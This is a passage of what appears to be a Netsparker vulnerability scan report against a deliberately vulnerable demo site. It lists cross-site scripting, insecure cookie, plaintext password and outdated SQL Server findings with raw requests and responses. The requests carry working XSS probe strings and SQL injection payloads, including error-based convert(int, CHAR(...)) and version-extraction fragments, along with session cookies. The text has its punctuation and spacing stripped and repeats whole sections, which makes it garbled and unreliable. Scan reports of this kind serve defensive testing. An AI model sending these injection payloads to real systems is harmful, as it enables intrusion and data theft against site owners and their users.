ltDOCTYPE htmlgtlthtmlgtltheadgtlttitlegtConversion failed when converting the varchar value _2dilemma to data type intlttitlegtltmeta name=viewport content=width=device-width gtltstylegtbody font-familyVerdanafont-weightnormalfont-size 7emcolorblack p font-familyVerdanafont-weightnormalcolorblackmargin-top -5pxb font-familyVerdanafont-weightboldcolorblackmargin-top -5pxH1 font-familyVerdanafont-weightnormalfont-size18ptcolorred H2 font-familyVerdanafont-weightnormalfont-size14ptcolormaroon pre font-familyConsolasLucida ConsoleMonospacefont-size11ptmargin0padding05emline-height14ptmarker font-weight bold color blacktext-decoration noneversion color grayerror margin-bottom 10pxexpandable text-decorationunderline font-weightbold colornavy cursorhand media screen and (max-width 639px) pre width 440px overflow auto white-space pre-wrap word-wrap break-word media screen and (max-width 479px) pre width 280px ltstylegtltheadgt
ltbody bgcolor=whitegt
ltspangtltH1gtServer Error in Applicationlthr width=100 size=1 color=silvergtltH1gt
lth2gt ltigtConversion failed when converting the varchar value _2dilemma to data type intltigt lth2gtltspangt
ltfont face=Arial Helvetica Geneva SunSans-Regular sans-serif gt
ltbgt Description ltbgtAn unhandled exception occurred during the execution of the current web request Please reviehellip
24 57
1 TOTALMEDIUM
CONFIRMED
1
8 Critical Form Served over HTTPNetsparkerdetectedthatacriticalformisservedoverHTTP
ImpactIfanattackercancarryoutaman-in-the-middleattackheshemaybeabletointercepttrafficbyinjectingJavaScriptcodeintothispageorchangingactionoftheHTTPcodetostealtheuserspasswordEventhoughthetargetpageisHTTPSthisdoesnotprotectthesystemagainstman-in-the-middleattacks
ThisissueisimportantasitnegatestheuseofSSLasaprivacyprotectionbarrier
Actions to Take1 Seetheremedyforsolution2 MoveallofyourcriticalformstoHTTPSanddonotallowthesepagestobeservedoverHTTP
RemedyAllsensitivedatashouldbetransferredoverHTTPSratherthanHTTPFormsshouldbeservedoverHTTPSAllaspectsoftheapplicationthatacceptuserinputstartingfromtheloginprocessshouldonlybeservedoverHTTPS
ClassificationOWASP2010-A9OWASP2013-A6PCIV20-654PCIV30-654CWE-319CAPEC-65WASC-04
81 AccountLogin CONFIRMEDhttphackyourselffirsttroyhuntcomAccountLogin
Form target actionhttpshackyourselffirsttroyhuntcomAccountLogin
RequestGET AccountLogin HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=57007E5718C949BB9DC8E5A74B45AFB8C217ACFD8FD98F8023C637FF8D1BABD440D2F2AD0AF35F86E8F32E6C454628305E619D8676ED718595618D220E725F2F5813F5A4B4604461ADB93EF796E499FE922687BE7848361F0CDEE483E11F997A92B2760021E9744C920EF124EEE2381E87A6A46642104F351292394B396FA228 ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
25 57
ResponseHTTP11 200 OKCache-Control privateDate Mon 25 Aug 2014 225838 GMTVary Accept-EncodingServer Microsoft-IIS80X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Encoding Content-Length 2549Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtml lang=engtltheadgtltmeta charset=utf-8 gtlttitlegtLog in - Supercar Showdownlttitlegtltlink href=faviconico rel=shortcut icon type=imagex-icon gtltmeta name=viewport content=width=device-width gtltlink href=Contentsitev=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1 rel=stylesheetgt
ltheadgtltbodygtltheader class=navbar-wrappergtltdiv class=containergtltdiv class=navbar navbar-inversegtltdiv class=navbar-innergtltbutton type=button class=btn btn-navbar data-toggle=collapse data-target=nav-collapsegtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltbuttongtlta class=brand href=httphackyourselffirsttroyhuntcomgtSupercar Showdownltagtltdiv class=nav-collapse collapsegtltul class=navgtltligtlta href=httphackyourselffirsttroyhuntcomSupercarLeaderboardgtLeaderboardltagtltligtltli class=dropdowngtlta href= class=dropdown-toggle data-toggle=dropdowngtMy account ltb class=caretgtltbgtltagtltul class=dropdown-menugtltform action=httphackyourselffirsttroyhuntcomAccountLogOff id=logoutForm method=post class=navbar-formgtltformgtltligtlta href=httpshackyourselffirsttroyhuntcomAccountChangePasswordgtChange passwordltagtltligtltligtlta href=httphackyourselffirsttroyhuntcomAccountUserProfilegtEdit profileltagtltligtlthellip
26 57
3 TOTALMEDIUM
9 [Possible] Cross-site ScriptingNetsparkerdetectedpossiblecross-sitescriptingwhichallowsanattackertoexecuteadynamicscript(JavaScriptVBScript)inthecontextoftheapplication
ThisallowsseveraldifferentattackopportunitiesmostlyhijackingthecurrentsessionoftheuserorchangingthelookofthepagebychangingtheHTMLontheflytostealtheuserscredentialsThishappensbecausetheinputenteredbyauserhasbeeninterpretedasHTMLJavaScriptVBScriptbythebrowserCross-sitescriptingtargetstheusersoftheapplicationinsteadoftheserverAlthoughthisisalimitationsinceitallowsattackerstohijackotheruserssessionsanattackermightattackanadministratortogainfullcontrolovertheapplication
AlthoughNetsparkerbelievesthereisacross-sitescriptinginhereitcould not confirm itWestronglyrecommendinvestigatingtheissuemanuallytoensureitiscross-sitescriptingandneedstobeaddressed
ImpactTherearemanydifferentattacksthatcanbeleveragedthroughtheuseofXSSincluding
HijackingusersactivesessionChangingthelookofthepagewithinthevictimsbrowserMountingasuccessfulphishingattackInterceptingdataandperformingman-in-the-middleattacks
RemedyThisissueoccursbecausethebrowserinterpretstheinputasactiveHTMLJavaScriptorVBScriptToavoidthisallinputandoutputfromtheapplicationshouldbefilteredencodedOutputshouldbefilteredencodedaccordingtotheoutputformatandlocation
Thereareanumberofpre-definedwellstructuredwhitelistlibrariesavailableformanydifferentenvironmentsGoodexamplesoftheseincludeOWASPReformandMicrosoftAnticross-sitescriptinglibraries
Remedy References[ASPNET]-MicrosoftAnti-XSSLibraryOWASPXSSPreventionCheatSheet
External ReferencesXSSCheatSheetOWASP-cross-sitescriptingXSSShellXSSTunnelling
ClassificationOWASP2010-A2OWASP2013-A3PCIV20-657PCIV30-657CWE-79CAPEC-19WASC-08
91 apivotehttphackyourselffirsttroyhuntcomapivote
ParametersParameter Type Value
userId POST 1
supercarId POST 3
comments POST --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt
NotesDue to the Content-type header of the response exploitation of this vulnerability might not be possible in all browsers or mightnot be possible at all The Content-type header indicates that there is a possibility of exploitation by changing the attackHowever Netsparker does not support confirming these issues You need to manually confirm this problem Generally lack of filteringin the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer
Certainty
27 57
RequestPOST apivote HTTP11Cache-Control no-cacheUser-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept Origin httphackyourselffirsttroyhuntcomReferer httphackyourselffirsttroyhuntcomSupercar3X-Requested-With XMLHttpRequestAccept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflateContent-Length 90Content-Type applicationx-www-form-urlencoded charset=UTF-8
userId=1ampsupercarId=3ampcomments=--gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt
ResponseHTTP11 500 Internal Server ErrorCache-Control no-cacheDate Mon 25 Aug 2014 232047 GMTPragma no-cacheServer Microsoft-IIS80X-XSS-Protection 0X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 2985Content-Type applicationjson charset=utf-8Expires -1
MessageAn error has occurredExceptionMessageUnclosed quotation mark after the character string --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt)rnIncorrect syntax near --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt)ExceptionTypeSystemDataSqlClientSqlExceptionStackTrace atSystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)rn atSystemDataSqlClientSqlInternalConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)rn atSystemDataSqlClientTdsParserThrowExceptionAndWarning(TdsParserStateObject stateObj Boolean callerHasConnectionLock Boolean asyncClose)rn atSystemDataSqlClientTdsParserTryRun(RunBehavior runBehavior SqlCommand cmdHandler SqlDataReader dataStream BulkCopySimpleResultSet bulkCopyHandlerTdsParserStateObject stateObj Booleanamp dataReady)rn at SystemDataSqlClientSqlCommandRunExecuteNonQueryTds(String methodName Boolean async Int32 timeout BooleanasyncWrite)rn at SystemDataSqlClientSqlCommandInternalExecuteNonQuery(TaskCompletionSource`1 completion String methodName Boolean sendToPipe Int32 timeout BooleanasyncWrite)rn at SystemDataSqlClientSqlCommandExecuteNonQuery()rn at WebControllersVoteControllerPost(Vote vote)rn at lambda_method(Closure Object Object[])rn at SystemWebHttpControllersReflectedHttpActionDescriptorActionExecutorltgtc__DisplayClass10ltGetExecutorgtb__9(Object instance Object[] methodParameters)rn atSystemWebHttpControllersReflectedHttpActionDescriptorActionExecutorExecute(Object instanchellip
92 apiadminhttphackyourselffirsttroyhuntcomapiadminnsextt=22--3E3Cstyle3E3CscRipt3E3CscRipt
ParametersParameter Type Value
nsextt GET --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x0002E0)ltscRiptgt
NotesDue to the Content-type header of the response exploitation of this vulnerability might not be possible in all browsers or mightnot be possible at all The Content-type header indicates that there is a possibility of exploitation by changing the attackHowever Netsparker does not support confirming these issues You need to manually confirm this problem Generally lack of filteringin the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer
Certainty
RequestGET apiadminnsextt=22--3E3Cstyle3E3CscRipt3E3CscRipt3Enetsparker(0x0002E0)3CscRipt3E HTTP11Cache-Control no-cacheAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
28 57
1 TOTALIMPORTANT
CONFIRMED
1
4 Permanent Cross-site ScriptingNetsparkeridentifiedpermanentcross-sitescriptingandconfirmedthisvulnerabilitybyanalyzingtheexecutionofinjectedJavaScript
PermanentXSSallowsanattackertoexecutedynamicscripts(JavaScript VBScript)inthecontextoftheapplicationThisallowsseveraldifferentattackopportunitiesmostlyhijackingthecurrentsessionoftheuserorchangingthelookofthepagebychangingtheHTMLontheflytostealtheuserscredentialsThishappensbecausetheinputenteredbytheuserhasbeeninterpretedbyHTMLJavaScriptVBScriptwithinthebrowser
PermanentmeansthattheattackwillbestoredinthebackendsystemInnormalXSSattacksanattackerneedstoe-mailthevictimbutinapermanentXSSanattackercanjustexecutetheattackandwaitforuserstoseetheaffectedpageAssoonassomeonevisitsthepagetheattackersstoredpayloadwillgetexecuted
XSStargetstheusersoftheapplicationinsteadoftheserverAlthoughthisisalimitationsinceitonlyallowsattackerstohijackotheruserssessionstheattackermightattackanadministratortogainfullcontrolovertheapplication
ImpactPermanentXSSisadangerousissuethathasmanyexploitationvectorssomeofwhichinclude
Userssession-sensitiveinformationsuchascookiescanbestolenXSScanenableclient-sidewormswhichcouldmodifydeleteorstealotherusersdatawithintheapplicationThewebsitecanberedirectedtoanewlocationdefacedorusedasaphishingsite
RemedyTheissueoccursbecausethebrowserinterpretstheinputasactiveHTMLJavaScriptorVBScriptToavoidthisallinputandoutputfromtheapplicationshouldbefilteredOutputshouldbefilteredaccordingtotheoutputformatandlocationTypicallytheoutputlocationisHTMLWheretheoutputisHTMLensureallactivecontentisremovedpriortoitspresentationtotheserver
Priortosanitizinguserinputensureyouhaveapre-definedlistofbothexpectedandacceptablecharacterswithwhichyoupopulateawhitelistThislistneedsonlybedefinedonceandshouldbeusedtosanitizeandvalidateallsubsequentinput
Thereareanumberofpre-definedwellstructuredwhitelistlibrariesavailableformanydifferentenvironmentsgoodexamplesoftheseincludetheOWASPReformandMicrosoftAnticross-sitescriptinglibraries
Remedy References[ASPNET]-MicrosoftAnti-XSSLibraryOWASPXSSPreventionCheatSheetOWASPAntiSamyJava
External ReferencesXSSCheatSheetOWASP-Cross-siteScriptingXSSShellXSSTunnelling
ClassificationOWASP2010-A2OWASP2013-A3PCIV20-657PCIV30-657CWE-79CAPEC-19WASC-08
41 Supercar3 CONFIRMEDhttphackyourselffirsttroyhuntcomSupercar3
Injection URLhttphackyourselffirsttroyhuntcomapivote
18 57
Injection RequestPOST apivote HTTP11Cache-Control no-cacheUser-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept Origin httphackyourselffirsttroyhuntcomReferer httphackyourselffirsttroyhuntcomSupercar3X-Requested-With XMLHttpRequestAccept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflateContent-Length 77Content-Type applicationx-www-form-urlencoded charset=UTF-8
userId=1ampsupercarId=3ampcomments=223e3cnet+sparker3dnetsparker(0x00043F)3e
Identification RequestGET Supercar3 HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
Injection ResponseHTTP11 201 CreatedCache-Control no-cacheDate Mon 25 Aug 2014 232053 GMTPragma no-cacheServer Microsoft-IIS80X-XSS-Protection 0X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 0Expires -1
Identification Responsehellip1))ANDISNULL(ASCII(SUBSTRING(CAST((SELECTversion)ASvarchar(8000))11))0)=1lttdgtlttrgtlttrgtlttdgtTroy Huntlttdgtlttdgtgtltnet sparker=netsparker(0x00043F)gtlttdgtlttrgtlttrgtlttdgtTroy Huntlttdgtlttdgt-1OR1=1)ANDISNULL(ASCII(SUBSTRING(CAST((SELECTversion)ASvarchar(8000)hellip
19 57
1 TOTALIMPORTANT
CONFIRMED
1
5 Password Transmitted over HTTPNetsparkerdetectedthatpassworddataisbeingtransmittedoverHTTP
ImpactIfanattackercaninterceptnetworktrafficheshecanstealuserscredentials
Actions to Take1 Seetheremedyforsolution2 MoveallofyourcriticalformsandpagestoHTTPSanddonotservethemoverHTTP
RemedyAllsensitivedatashouldbetransferredoverHTTPSratherthanHTTPFormsshouldbeservedoverHTTPSAllaspectsoftheapplicationthatacceptuserinputstartingfromtheloginprocessshouldonlybeservedoverHTTPS
ClassificationOWASP2010-A9OWASP2013-A6PCIV20-654PCIV30-654CWE-319CAPEC-65WASC-04
51 AccountRegister CONFIRMEDhttphackyourselffirsttroyhuntcomAccountRegister
Form target actionhttphackyourselffirsttroyhuntcomAccountRegister
RequestGET AccountRegister HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=57007E5718C949BB9DC8E5A74B45AFB8C217ACFD8FD98F8023C637FF8D1BABD440D2F2AD0AF35F86E8F32E6C454628305E619D8676ED718595618D220E725F2F5813F5A4B4604461ADB93EF796E499FE922687BE7848361F0CDEE483E11F997A92B2760021E9744C920EF124EEE2381E87A6A46642104F351292394B396FA228 ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
ResponseHTTP11 200 OKCache-Control privateDate Mon 25 Aug 2014 225838 GMTVary Accept-EncodingServer Microsoft-IIS80X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Encoding Content-Length 2265Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtml lang=engtltheadgtltmeta charset=utf-8 gtlttitlegtRegister - Supercar Showdownlttitlegtltlink href=faviconico rel=shortcut icon type=imagex-icon gtltmeta name=viewport content=width=device-width gtltlink href=Contentsitev=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1 rel=stylesheetgt
ltheadgtltbodygtltheader class=navbar-wrappergtltdiv class=containergtltdiv class=navbar navbar-inversegtltdiv class=navbar-innergtltbutton type=button class=btn btn-navbar data-toggle=collapse data-target=nav-collapsegtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltbuttongtlta class=brand href=httphackyourselffirsttroyhuntcomgtSupercar Showdownltagtltdiv class=nav-collapse collapsegtltul class=navgtltligtlta href=httphackyourselffirsttroyhuntcomSupercarLeaderboardgtLeaderboardltagtltligtltli class=dropdowngtlta href= class=dropdown-toggle data-toggle=dropdowngtMy account ltb class=caretgtltbgtltagtltul class=dropdown-menugtltform action=httphackyourselffirsttroyhuntcomAccountLogOff id=logoutForm method=post class=navbar-formgtltformgtltligtlta href=httpshackyourselffirsttroyhuntcomAccountChangePasswordgtChange passwordltagtltligtltligtlta href=httphackyourselffirsttroyhuntcomAccountUserProfilegtEdit profileltagtltligt
hellip
20 57
1 TOTALIMPORTANT
CONFIRMED
1
6 Cookie Not Marked as SecureNetsparkeridentifiedacookienotmarkedassecureandtransmittedoverHTTPS
Thismeansthecookiecouldpotentiallybestolenbyanattackerwhocansuccessfullyinterceptanddecryptthetrafficorfollowingasuccessfulman-in-the-middleattack
ImpactThiscookiewillbetransmittedoveraHTTPconnectionthereforeifthiscookieisimportant(such as a session cookie)anattackermightinterceptitandhijackavictimssessionIftheattackercancarryoutaman-in-the-middleattackheshecanforcethevictimtomakeanHTTPrequesttostealthecookie
Actions to Take1 Seetheremedyforsolution2 Markallcookiesusedwithintheapplicationassecure(If the cookie is not related to authentication or does not carry any personal
information you do not have to mark it as secure)
RemedyMarkallcookiesusedwithintheapplicationassecure
Required Skills for Successful ExploitationToexploitthisissuetheattackerneedstobeabletointercepttrafficThisgenerallyrequireslocalaccesstothewebserverortothevictimsnetworkAttackersneedtobeunderstandlayer2havephysicalaccesstosystemseitheraswaypointsforthetrafficorhavelocallygainedaccesstotoasystembetweenthevictimandthewebserver
External ReferencesNETCookieSecurePropertyHowtoCreateTotallySecureCookies
ClassificationOWASP2010-A9OWASP2013-A6PCIV20-654PCIV30-654CWE-614CAPEC-102WASC-15
61 AccountLogin CONFIRMEDhttpshackyourselffirsttroyhuntcomAccountLogin
Identified CookieAuthCookie
RequestPOST AccountLogin HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccountLoginAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=EA9A3D322DD4B030B3239FA3119364226C4AFC1146DACC18C04B897769A79F835F0F451B34A8B312CD8F5A77E3B5421B58074E3E4C68E5FA779CCC709E259C828EFF4936F4BB152D308EA778C82324B3CAF1BA60C0C18C134AEB7C5A5153AF181C536B617EF3F6DFB1052DDB94CFEB3F91DCFE08967136E4266A5E8249781E2F ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflateContent-Length 57Content-Type applicationx-www-form-urlencoded
Email=netsparker40examplecomampPassword=3ampRememberMe=true
21 57
ResponseHTTP11 302 FoundCache-Control privateDate Mon 25 Aug 2014 225900 GMTLocation httphackyourselffirsttroyhuntcomServer Microsoft-IIS80Set-CookieAuthCookie=83F87081CDBC4CAC96FBBA3C773F139F952893E2A76E1B1AD3A6E8C32B935F9A14A7467ADD80BBC637E096BB698E00D1E437A060334677EA4A758738F5F619C1C59687F889818B80FF72D699D7B9FEA6F2F89F33E2A38DABBD39EEE2F5538787A104A63D8131741D813003A6B1E980EF52692C81A2395EB8B18B21613B890AF7 expires=Tue 25-Aug-2015 225900 GMT path=Password=Mw== expires=Tue 25-Aug-2015 225900 GMT path=Email=netsparkerexamplecom expires=Tue 25-Aug-2015 225900 GMT path=
X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 155Content-Type texthtml charset=utf-8
lthtmlgtltheadgtlttitlegtObject movedlttitlegtltheadgtltbodygtlth2gtObject moved to lta href=httphackyourselffirsttroyhuntcomgthereltagtlth2gtltbodygtlthtmlgt
22 57
1 TOTALIMPORTANT
7 Out-of-date Version (Microsoft SQL Server)Netsparkeridentifiedyouareusinganout-of-dateversionofMicrosoftSQL
ImpactSincethisisanoldversionofthesoftwareitmaybevulnerabletoattacks
RemedyPleaseupgradeyourinstallationofMicrosoftSQLServertothelateststableversion
ClassificationOWASP2010-A6OWASP2013-A9PCIV20-61PCIV30-61CAPEC-310
71 Make1httphackyourselffirsttroyhuntcomMake1orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHA
Identified Version110922217
Latest Version12002000
Vulnerability DatabaseResult is based on 18082014 vulnerability database content
Certainty
RequestGET Make1orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHAR(64)2bCHAR(50)2bCHAR(100)2bCHAR(105)2bCHAR(108)2bCHAR(101)2bCHAR(109)2bCHAR(109)2bCHAR(97))+FROM+syscolumns) HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
23 57
ResponseHTTP11 500 Internal Server ErrorCache-Control privateDate Mon 25 Aug 2014 225955 GMTServer Microsoft-IIS80X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 14154Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtmlgtltheadgtlttitlegtConversion failed when converting the varchar value _2dilemma to data type intlttitlegtltmeta name=viewport content=width=device-width gtltstylegtbody font-familyVerdanafont-weightnormalfont-size 7emcolorblack p font-familyVerdanafont-weightnormalcolorblackmargin-top -5pxb font-familyVerdanafont-weightboldcolorblackmargin-top -5pxH1 font-familyVerdanafont-weightnormalfont-size18ptcolorred H2 font-familyVerdanafont-weightnormalfont-size14ptcolormaroon pre font-familyConsolasLucida ConsoleMonospacefont-size11ptmargin0padding05emline-height14ptmarker font-weight bold color blacktext-decoration noneversion color grayerror margin-bottom 10pxexpandable text-decorationunderline font-weightbold colornavy cursorhand media screen and (max-width 639px) pre width 440px overflow auto white-space pre-wrap word-wrap break-word media screen and (max-width 479px) pre width 280px ltstylegtltheadgt
ltbody bgcolor=whitegt
ltspangtltH1gtServer Error in Applicationlthr width=100 size=1 color=silvergtltH1gt
lth2gt ltigtConversion failed when converting the varchar value _2dilemma to data type intltigt lth2gtltspangt
ltfont face=Arial Helvetica Geneva SunSans-Regular sans-serif gt
ltbgt Description ltbgtAn unhandled exception occurred during the execution of the current web request Please reviehellip
24 57
1 TOTALMEDIUM
CONFIRMED
1
8 Critical Form Served over HTTPNetsparkerdetectedthatacriticalformisservedoverHTTP
ImpactIfanattackercancarryoutaman-in-the-middleattackheshemaybeabletointercepttrafficbyinjectingJavaScriptcodeintothispageorchangingactionoftheHTTPcodetostealtheuserspasswordEventhoughthetargetpageisHTTPSthisdoesnotprotectthesystemagainstman-in-the-middleattacks
ThisissueisimportantasitnegatestheuseofSSLasaprivacyprotectionbarrier
Actions to Take1 Seetheremedyforsolution2 MoveallofyourcriticalformstoHTTPSanddonotallowthesepagestobeservedoverHTTP
RemedyAllsensitivedatashouldbetransferredoverHTTPSratherthanHTTPFormsshouldbeservedoverHTTPSAllaspectsoftheapplicationthatacceptuserinputstartingfromtheloginprocessshouldonlybeservedoverHTTPS
ClassificationOWASP2010-A9OWASP2013-A6PCIV20-654PCIV30-654CWE-319CAPEC-65WASC-04
81 AccountLogin CONFIRMEDhttphackyourselffirsttroyhuntcomAccountLogin
Form target actionhttpshackyourselffirsttroyhuntcomAccountLogin
RequestGET AccountLogin HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=57007E5718C949BB9DC8E5A74B45AFB8C217ACFD8FD98F8023C637FF8D1BABD440D2F2AD0AF35F86E8F32E6C454628305E619D8676ED718595618D220E725F2F5813F5A4B4604461ADB93EF796E499FE922687BE7848361F0CDEE483E11F997A92B2760021E9744C920EF124EEE2381E87A6A46642104F351292394B396FA228 ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
25 57
ResponseHTTP11 200 OKCache-Control privateDate Mon 25 Aug 2014 225838 GMTVary Accept-EncodingServer Microsoft-IIS80X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Encoding Content-Length 2549Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtml lang=engtltheadgtltmeta charset=utf-8 gtlttitlegtLog in - Supercar Showdownlttitlegtltlink href=faviconico rel=shortcut icon type=imagex-icon gtltmeta name=viewport content=width=device-width gtltlink href=Contentsitev=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1 rel=stylesheetgt
